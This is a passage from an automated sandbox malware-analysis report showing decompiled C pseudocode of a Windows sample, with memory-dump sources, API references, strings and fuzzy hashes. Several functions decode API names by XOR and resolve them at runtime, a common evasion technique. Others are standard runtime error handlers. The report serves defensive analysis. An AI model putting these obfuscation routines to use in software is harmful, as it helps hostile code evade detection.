                                                                    					_t20 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t20) =  *(_t23 + _t20) ^ 0x000000d9;
                                                                    						_t20 = _t20 + 1;
                                                                    					} while (_t20 < 0xe);
                                                                    					_t17 = E0041A600(_t23);
                                                                    					 *0x447e34 = _t17;
                                                                    				}
                                                                    				return  *_t17(_a4);
                                                                    			}



















                                                                    0x0041b250
                                                                    0x0041b25a
                                                                    0x0041b25e
                                                                    0x0041b262
                                                                    0x0041b266
                                                                    0x0041b26a
                                                                    0x0041b26f
                                                                    0x0041b274
                                                                    0x0041b279
                                                                    0x0041b27e
                                                                    0x0041b283
                                                                    0x0041b288
                                                                    0x0041b28d
                                                                    0x0041b292
                                                                    0x0041b297
                                                                    0x0041b29c
                                                                    0x0041b2a1
                                                                    0x0041b2a3
                                                                    0x0041b2a3
                                                                    0x0041b2a7
                                                                    0x0041b2a8
                                                                    0x0041b2b1
                                                                    0x0041b2b9
                                                                    0x0041b2b9
                                                                    0x0041b2c8

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09ed247ded2169f2a45123cc2de5e80609355bb9fe1479eb81f1b96cfbfce289
                                                                    • Instruction ID: 57739f8452e7678ae673a334561de674b6d42cc0adfd6adad529791155b58d77
                                                                    • Opcode Fuzzy Hash: 09ed247ded2169f2a45123cc2de5e80609355bb9fe1479eb81f1b96cfbfce289
                                                                    • Instruction Fuzzy Hash: 3501956141CBC29DC322DBBC494845EBE9149A7134F48CBDDF1F98A2E6E624844687A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041AC50() {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t20;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				_t17 =  *0x447df0;
                                                                    				if(_t17 == 0) {
                                                                    					_v15 = 0xbe;
                                                                    					_v9 = 0xbe;
                                                                    					_v5 = 0xbe;
                                                                    					 *_t23 = 0x9c;
                                                                    					_v14 = 0xaf;
                                                                    					_v13 = 0x8b;
                                                                    					_v12 = 0xa9;
                                                                    					_v11 = 0xb4;
                                                                    					_v10 = 0xb8;
                                                                    					_v8 = 0xa8;
                                                                    					_v7 = 0xa8;
                                                                    					_v6 = 0x93;
                                                                    					_v4 = 0xba;
                                                                    					_v3 = 0xab;
                                                                    					_v2 = 0xdb;
                                                                    					_t20 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t20) =  *(_t23 + _t20) ^ 0x000000db;
                                                                    						_t20 = _t20 + 1;
                                                                    					} while (_t20 < 0xf);
                                                                    					_t17 = E0041A600(_t23);
                                                                    					 *0x447df0 = _t17;
                                                                    				}
                                                                    				return  *_t17();
                                                                    			}




















                                                                    0x0041ac50
                                                                    0x0041ac5a
                                                                    0x0041ac60
                                                                    0x0041ac64
                                                                    0x0041ac68
                                                                    0x0041ac6c
                                                                    0x0041ac70
                                                                    0x0041ac75
                                                                    0x0041ac7a
                                                                    0x0041ac7f
                                                                    0x0041ac84
                                                                    0x0041ac89
                                                                    0x0041ac8d
                                                                    0x0041ac91
                                                                    0x0041ac96
                                                                    0x0041ac9b
                                                                    0x0041aca0
                                                                    0x0041aca5
                                                                    0x0041aca7
                                                                    0x0041aca7
                                                                    0x0041acab
                                                                    0x0041acac
                                                                    0x0041acb5
                                                                    0x0041acbd
                                                                    0x0041acbd
                                                                    0x0041acc7

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b15e55c6de7c68874b4ce76700fd10d7109af1418e2d9654898de2ab03132061
                                                                    • Instruction ID: d3ae499feff51694d6768c024bd7e1435e2b7c9c951d6659dca82bde3883cca1
                                                                    • Opcode Fuzzy Hash: b15e55c6de7c68874b4ce76700fd10d7109af1418e2d9654898de2ab03132061
                                                                    • Instruction Fuzzy Hash: 3501975141D7C29AC322DB7C584405EBE9158A3130F88CF9DE1F98B2E2E2248156C7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00426A34() {
                                                                    				intOrPtr _t20;
                                                                    				int _t21;
                                                                    				long _t24;
                                                                    				void* _t31;
                                                                    				void* _t51;
                                                                    				long _t52;
                                                                    				void* _t57;
                                                                    				signed int _t67;
                                                                    				void** _t69;
                                                                    				void* _t70;
                                                                    				void* _t72;
                                                                    				void* _t73;
                                                                    
                                                                    				_t70 = _t72 - 0x8c;
                                                                    				_t73 = _t72 - 0x10c;
                                                                    				_t20 =  *0x446f24; // 0x82246c35
                                                                    				_t52 =  *(_t70 + 0x94);
                                                                    				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                    				_t21 = 0;
                                                                    				while(_t52 !=  *((intOrPtr*)(0x4475e0 + _t21 * 8))) {
                                                                    					_t21 = _t21 + 1;
                                                                    					if(_t21 < 0x13) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				_t67 = _t21 << 3;
                                                                    				_t6 = _t67 + 0x4475e0; // 0xb0000000
                                                                    				if(_t52 ==  *_t6) {
                                                                    					_t21 =  *0x4480e8; // 0x0
                                                                    					if(_t21 == 1 || _t21 == 0 &&  *0x446f14 == 1) {
                                                                    						_t17 = _t67 + 0x4475e4; // 0x430ab0
                                                                    						_t69 = _t17;
                                                                    						_t24 = E00422F20( *_t69);
                                                                    						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                    					} else {
                                                                    						if(_t52 != 0xfc) {
                                                                    							 *((char*)(_t70 + 0x84)) = 0;
                                                                    							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                    								E00423FB0(_t70 - 0x80, "<program name unknown>");
                                                                    							}
                                                                    							_t63 = _t70 - 0x80;
                                                                    							if(E00422F20(_t70 - 0x80) + 1 > 0x3c) {
                                                                    								E004281C0(E00422F20(_t63) + _t70 - 0x45, "...", 3);
                                                                    								_t73 = _t73 + 0x10;
                                                                    							}
                                                                    							_t31 = E00422F20(_t63);
                                                                    							_t12 = _t67 + 0x4475e4; // 0x430ab0
                                                                    							_t14 = E00422F20( *_t12) + 0x1c; // 0x1c
                                                                    							_pop(_t57);
                                                                    							E00422920(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                    							_t51 = _t73;
                                                                    							E00423FB0(_t51, "Runtime Error!\n\nProgram: ");
                                                                    							E00423FC0(_t51, _t63);
                                                                    							E00423FC0(_t51, "\n\n");
                                                                    							_t15 = _t67 + 0x4475e4; // 0x430ab0
                                                                    							E00423FC0(_t51,  *_t15);
                                                                    							_push(0x12010);
                                                                    							_push("Microsoft Visual C++ Runtime Library");
                                                                    							_push(_t51);
                                                                    							_t21 = E00429202();
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E00428381(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                    			}















                                                                    0x00426a35
                                                                    0x00426a3c
                                                                    0x00426a42
                                                                    0x00426a47
                                                                    0x00426a4f
                                                                    0x00426a58
                                                                    0x00426a5a
                                                                    0x00426a63
                                                                    0x00426a67
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426a67
                                                                    0x00426a6b
                                                                    0x00426a6e
                                                                    0x00426a74
                                                                    0x00426a7a
                                                                    0x00426a82
                                                                    0x00426b6f
                                                                    0x00426b6f
                                                                    0x00426b77
                                                                    0x00426b89
                                                                    0x00426a99
                                                                    0x00426a9f
                                                                    0x00426aaf
                                                                    0x00426abd
                                                                    0x00426ac8
                                                                    0x00426ace
                                                                    0x00426acf
                                                                    0x00426adf
                                                                    0x00426afb
                                                                    0x00426b00
                                                                    0x00426b00
                                                                    0x00426b04
                                                                    0x00426b09
                                                                    0x00426b16
                                                                    0x00426b1e
                                                                    0x00426b22
                                                                    0x00426b27
                                                                    0x00426b2f
                                                                    0x00426b36
                                                                    0x00426b41
                                                                    0x00426b46
                                                                    0x00426b4d
                                                                    0x00426b52
                                                                    0x00426b57
                                                                    0x00426b5c
                                                                    0x00426b5d
                                                                    0x00426b62
                                                                    0x00426a9f
                                                                    0x00426a82
                                                                    0x00426baa

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 00426AB5
                                                                    • _strcat.LIBCMT ref: 00426AC8
                                                                    • _strlen.LIBCMT ref: 00426AD5
                                                                    • _strlen.LIBCMT ref: 00426AE4
                                                                    • _strncpy.LIBCMT ref: 00426AFB
                                                                    • _strlen.LIBCMT ref: 00426B04
                                                                    • _strlen.LIBCMT ref: 00426B11
                                                                    • _strcat.LIBCMT ref: 00426B2F
                                                                    • _strlen.LIBCMT ref: 00426B77
                                                                    • GetStdHandle.KERNEL32(000000F4,00430AB0,00000000,?,00000000,00000000,00000000,00000000), ref: 00426B82
                                                                    • WriteFile.KERNEL32(00000000), ref: 00426B89
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3601721357-4022980321
                                                                    • Opcode ID: 603f9fcbfe5cbeba837c69f9aabc8334fdefa1aec9d5d7cb1c0f1f5f101e93d3
                                                                    • Instruction ID: e2188ca0826f045f4db73bccfd4e3ecd74b0df9453972094ebac32c139a34d3a
                                                                    • Opcode Fuzzy Hash: 603f9fcbfe5cbeba837c69f9aabc8334fdefa1aec9d5d7cb1c0f1f5f101e93d3
                                                                    • Instruction Fuzzy Hash: 02314672700224AADB20EB74BD86FAE7778EB49308F610A1FF405D7541DE7CA945872C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E00404920(intOrPtr _a4) {
                                                                    				char _v4;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				void* _v52;
                                                                    				void* _v56;
                                                                    				void* _v64;
                                                                    				void* _v65;
                                                                    				void* _v66;
                                                                    				void* _v67;
                                                                    				void* _v68;
                                                                    				void* _v69;
                                                                    				void* _v70;
                                                                    				void* _v71;
                                                                    				void* _v72;
                                                                    				void* _v73;
                                                                    				void* _v74;
                                                                    				void* _v75;
                                                                    				void* _v76;
                                                                    				void* _v77;
                                                                    				void* _v78;
                                                                    				void* _v79;
                                                                    				void* _v80;
                                                                    				void* _v81;
                                                                    				void* _v82;
                                                                    				void* _v83;
                                                                    				void* _v84;
                                                                    				void* _v120;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t40;
                                                                    				void* _t45;
                                                                    				CHAR* _t48;
                                                                    				void* _t59;
                                                                    				void* _t72;
                                                                    
                                                                    				_t72 =  &_v32;
                                                                    				_v32 = 0;
                                                                    				_t53 = E0041B120(0x42a, 0, _a4);
                                                                    				if(_t37 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t60 =  *((intOrPtr*)(_t72 + 0x34));
                                                                    					_t66 =  *0x43003c( *((intOrPtr*)(_t72 + 0x34)), _t59) + 1;
                                                                    					_t40 = E0041BC70(_t53, 0,  *0x43003c( *((intOrPtr*)(_t72 + 0x34)), _t59) + 1, 0x1000, 4);
                                                                    					 *((intOrPtr*)(_t72 + 0x34)) = _t40;
                                                                    					if(_t40 != 0 && E0041BD10(_t53, _t40, _t60, _t66, 0) != 0) {
                                                                    						 *((char*)(_t72 + 0x38)) = 0x51;
                                                                    						_v32 = 0x1a;
                                                                    						 *((char*)(_t72 + 0x19)) = 0x34;
                                                                    						 *((char*)(_t72 + 0x1a)) = 0x23;
                                                                    						 *((char*)(_t72 + 0x1b)) = 0x3f;
                                                                    						_v28 = 0x34;
                                                                    						 *((char*)(_t72 + 0x1d)) = 0x3d;
                                                                    						 *((char*)(_t72 + 0x1e)) = 0x62;
                                                                    						 *((char*)(_t72 + 0x1f)) = 0x63;
                                                                    						 *((char*)(_t72 + 0x20)) = 0x51;
                                                                    						_t45 = E004046E0(9,  &_v32, _t72 + 0x34);
                                                                    						_v4 = 0x28;
                                                                    						 *((char*)(_t72 + 0x2c)) = 0x28;
                                                                    						 *((char*)(_t72 + 0x20)) = 0x64;
                                                                    						 *((char*)(_t72 + 0x24)) = 0x64;
                                                                    						 *((char*)(_t72 + 0x25)) = 0x47;
                                                                    						 *((char*)(_t72 + 0x26)) = 0x49;
                                                                    						 *((char*)(_t72 + 0x27)) = 0x4c;
                                                                    						 *((char*)(_t72 + 0x29)) = 0x41;
                                                                    						 *((char*)(_t72 + 0x2a)) = 0x4a;
                                                                    						 *((char*)(_t72 + 0x2b)) = 0x5a;
                                                                    						 *((char*)(_t72 + 0x2c)) = 0x49;
                                                                    						 *((char*)(_t72 + 0x2d)) = 0x5a;
                                                                    						 *((char*)(_t72 + 0x2e)) = 0x51;
                                                                    						 *((char*)(_t72 + 0x2f)) = 0x69;
                                                                    						_t48 = E004046E0(0xd, _t72 + 0x24,  &_v4);
                                                                    						if(GetProcAddress(E0041BDC0(_t45), _t48) != 0 && E0041BE50(_t53, 0, 0, _t50, _a4, 0, 0) != 0) {
                                                                    							 *((intOrPtr*)(_t72 + 0x10)) = 1;
                                                                    							E0041A8E0(_t51);
                                                                    						}
                                                                    					}
                                                                    					E0041A8E0(_t53);
                                                                    					return  *((intOrPtr*)(_t72 + 0xc));
                                                                    				}
                                                                    			}





































                                                                    0x00404920
                                                                    0x00404932
                                                                    0x0040493b
                                                                    0x0040493f
                                                                    0x00404a77
                                                                    0x00404945
                                                                    0x00404946
                                                                    0x0040495a
                                                                    0x0040495f
                                                                    0x00404966
                                                                    0x0040496a
                                                                    0x00404994
                                                                    0x00404999
                                                                    0x0040499e
                                                                    0x004049a2
                                                                    0x004049a7
                                                                    0x004049ac
                                                                    0x004049b0
                                                                    0x004049b5
                                                                    0x004049ba
                                                                    0x004049bf
                                                                    0x004049c4
                                                                    0x004049cf
                                                                    0x004049d3
                                                                    0x004049d7
                                                                    0x004049dd
                                                                    0x004049f1
                                                                    0x004049f6
                                                                    0x004049fa
                                                                    0x004049ff
                                                                    0x00404a04
                                                                    0x00404a09
                                                                    0x00404a0d
                                                                    0x00404a11
                                                                    0x00404a15
                                                                    0x00404a1a
                                                                    0x00404a1f
                                                                    0x00404a35
                                                                    0x00404a50
                                                                    0x00404a58
                                                                    0x00404a58
                                                                    0x00404a35
                                                                    0x00404a5e
                                                                    0x00404a6d
                                                                    0x00404a6d

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?,?,0000042A,00000000,?), ref: 0040494B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00404A2C
                                                                      • Part of subcall function 0041A8E0: FindCloseChangeNotification.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041A950
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressChangeCloseFindNotificationProclstrlen
                                                                    • String ID: #$=$?$A$G$J$L$Q$Q$Q$b$c$i
                                                                    • API String ID: 3627845251-4186992372
                                                                    • Opcode ID: 262f5ea2f6da85a749cb0306011de52f5d49b5a9e64993040fb017a04ae87bb1
                                                                    • Instruction ID: ccf4b14a2e2ce1fdf5d6933e9844bf3be8dad8627baa7f4f7736dfb343f8383b
                                                                    • Opcode Fuzzy Hash: 262f5ea2f6da85a749cb0306011de52f5d49b5a9e64993040fb017a04ae87bb1
                                                                    • Instruction Fuzzy Hash: BE41C77120D3C0ADE311EA655844B9BBFD88FA6748F04195DF6C867283C2A9D648C7BF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E00429C54(void* __ebx, signed int __edi, signed int __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12, long _a16) {
                                                                    				intOrPtr _v0;
                                                                    				signed int _v4;
                                                                    				long _v8;
                                                                    				long _v12;
                                                                    				intOrPtr _v20;
                                                                    				signed int _v24;
                                                                    				intOrPtr _v28;
                                                                    				char _v32;
                                                                    				char _v292;
                                                                    				char* _v296;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr* _t39;
                                                                    				void* _t47;
                                                                    				void* _t62;
                                                                    				long _t63;
                                                                    				long _t68;
                                                                    				void* _t85;
                                                                    				signed int _t95;
                                                                    				char* _t96;
                                                                    				signed int _t97;
                                                                    				signed int _t99;
                                                                    				void* _t100;
                                                                    				signed int _t101;
                                                                    				signed int _t107;
                                                                    
                                                                    				_t99 = __esi;
                                                                    				_t95 = __edi;
                                                                    				_push(0x118);
                                                                    				_push(0x431518);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t38 =  *0x446f24; // 0x82246c35
                                                                    				_v28 = _t38;
                                                                    				_t39 =  *0x448590; // 0x0
                                                                    				if(_t39 == 0) {
                                                                    					if(_a8 == 1) {
                                                                    						_t96 = "Buffer overrun detected!";
                                                                    						_v296 = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                    						_t100 = 0xb9;
                                                                    					} else {
                                                                    						_t96 = "Unknown security failure detected!";
                                                                    						_v296 = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                    						_t100 = 0xd4;
                                                                    					}
                                                                    					_v32 = 0;
                                                                    					if(GetModuleFileNameA(0,  &_v292, 0x104) == 0) {
                                                                    						E00423FB0( &_v292, "<program name unknown>");
                                                                    					}
                                                                    					_t81 =  &_v292;
                                                                    					if(E00422F20( &_v292) + 0xb > 0x3c) {
                                                                    						_t81 = E00422F20( &_v292) +  &_v292 - 0x31;
                                                                    						E004281C0(E00422F20( &_v292) +  &_v292 - 0x31, "...", 3);
                                                                    						_t107 = _t107 + 0x10;
                                                                    					}
                                                                    					_t47 = E00422F20(_t81);
                                                                    					_pop(_t85);
                                                                    					E00422920(_t47 + _t100 + 0x0000000c + 0x00000003 & 0xfffffffc, _t85);
                                                                    					_v24 = _t107;
                                                                    					_t99 = _t107;
                                                                    					E00423FB0(_t99, _t96);
                                                                    					_t95 = "\n\n";
                                                                    					E00423FC0(_t99, _t95);
                                                                    					E00423FC0(_t99, "Program: ");
                                                                    					E00423FC0(_t99, _t81);
                                                                    					E00423FC0(_t99, _t95);
                                                                    					E00423FC0(_t99, _v296);
                                                                    					_push(0x12010);
                                                                    					_push("Microsoft Visual C++ Runtime Library");
                                                                    					_push(_t99);
                                                                    					E00429202();
                                                                    					_t107 = _t107 + 0x3c;
                                                                    				} else {
                                                                    					_v4 = 0;
                                                                    					 *_t39(_a8, _a12);
                                                                    					_pop(_t85);
                                                                    					_v4 = _v4 | 0xffffffff;
                                                                    				}
                                                                    				E0042552E(3);
                                                                    				asm("int3");
                                                                    				_push(_t85);
                                                                    				_push(_t85);
                                                                    				_push(_t99);
                                                                    				_t101 = _v8;
                                                                    				_v24 = _v4;
                                                                    				_push(_t95);
                                                                    				_v20 = _v0;
                                                                    				_t62 = E00428AF0(_t101);
                                                                    				_t97 = _t95 | 0xffffffff;
                                                                    				if(_t62 != _t97) {
                                                                    					_t63 = SetFilePointer(_t62, _v12,  &_v8, _a16);
                                                                    					_v12 = _t63;
                                                                    					if(_t63 != _t97 || GetLastError() == 0) {
                                                                    						 *( *((intOrPtr*)(0x44b140 + (_t101 >> 5) * 4)) + 4 + ((_t101 & 0x0000001f) + (_t101 & 0x0000001f) * 8) * 4) =  *( *((intOrPtr*)(0x44b140 + (_t101 >> 5) * 4)) + 4 + ((_t101 & 0x0000001f) + (_t101 & 0x0000001f) * 8) * 4) & 0x000000fd;
                                                                    						_t68 = _v12;
                                                                    					} else {
                                                                    						E00426868(_t69);
                                                                    						goto L17;
                                                                    					}
                                                                    				} else {
                                                                    					 *((intOrPtr*)(E00426856())) = 9;
                                                                    					L17:
                                                                    					_t68 = _t97;
                                                                    				}
                                                                    				return _t68;
                                                                    			}



























                                                                    0x00429c54
                                                                    0x00429c54
                                                                    0x00429c54
                                                                    0x00429c59
                                                                    0x00429c5e
                                                                    0x00429c63
                                                                    0x00429c68
                                                                    0x00429c6b
                                                                    0x00429c74
                                                                    0x00429c99
                                                                    0x00429cb1
                                                                    0x00429cb6
                                                                    0x00429cc0
                                                                    0x00429c9b
                                                                    0x00429c9b
                                                                    0x00429ca0
                                                                    0x00429caa
                                                                    0x00429caa
                                                                    0x00429cc5
                                                                    0x00429cdd
                                                                    0x00429ceb
                                                                    0x00429cf1
                                                                    0x00429cf2
                                                                    0x00429d07
                                                                    0x00429d1c
                                                                    0x00429d26
                                                                    0x00429d2b
                                                                    0x00429d2b
                                                                    0x00429d2f
                                                                    0x00429d34
                                                                    0x00429d3f
                                                                    0x00429d44
                                                                    0x00429d47
                                                                    0x00429d4b
                                                                    0x00429d50
                                                                    0x00429d57
                                                                    0x00429d62
                                                                    0x00429d69
                                                                    0x00429d70
                                                                    0x00429d7c
                                                                    0x00429d81
                                                                    0x00429d86
                                                                    0x00429d8b
                                                                    0x00429d8c
                                                                    0x00429d91
                                                                    0x00429c76
                                                                    0x00429c76
                                                                    0x00429c7f
                                                                    0x00429c82
                                                                    0x00429c83
                                                                    0x00429c83
                                                                    0x00429d96
                                                                    0x00429d9b
                                                                    0x00429d9f
                                                                    0x00429da0
                                                                    0x00429da4
                                                                    0x00429da5
                                                                    0x00429da8
                                                                    0x00429dae
                                                                    0x00429db0
                                                                    0x00429db3
                                                                    0x00429db8
                                                                    0x00429dbe
                                                                    0x00429dd8
                                                                    0x00429de0
                                                                    0x00429de3
                                                                    0x00429e12
                                                                    0x00429e15
                                                                    0x00429def
                                                                    0x00429df0
                                                                    0x00000000
                                                                    0x00429df5
                                                                    0x00429dc0
                                                                    0x00429dc5
                                                                    0x00429df6
                                                                    0x00429df6
                                                                    0x00429df8
                                                                    0x00429e1e

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00431518,00000118,00428369,00000001,00000000,004311F8,00000008,00426BA0,00000000,00000000,00000000), ref: 00429CD5
                                                                    • _strcat.LIBCMT ref: 00429CEB
                                                                    • _strlen.LIBCMT ref: 00429CFB
                                                                    • _strlen.LIBCMT ref: 00429D0C
                                                                    • _strncpy.LIBCMT ref: 00429D26
                                                                    • _strlen.LIBCMT ref: 00429D2F
                                                                    • _strcat.LIBCMT ref: 00429D4B
                                                                    Strings
                                                                    • Microsoft Visual C++ Runtime Library, xrefs: 00429D86
                                                                    • <program name unknown>, xrefs: 00429CDF
                                                                    • Unknown security failure detected!, xrefs: 00429C9B
                                                                    • A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated., xrefs: 00429CB6
                                                                    • ..., xrefs: 00429D20
                                                                    • Program: , xrefs: 00429D5C
                                                                    • A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated., xrefs: 00429CA0
                                                                    • Buffer overrun detected!, xrefs: 00429CB1, 00429D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                    • String ID: ...$<program name unknown>$A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated.$A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated.$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                    • API String ID: 3058806289-1010210193
                                                                    • Opcode ID: 54a1af11615edc5cb99fd5eabcd91fc2120b0ec5e023a510fb0467e6766a05b0
                                                                    • Instruction ID: 7cd09d1992efc637761828a68cb66a96c96519ae212bd23a34ed079d71f708ea
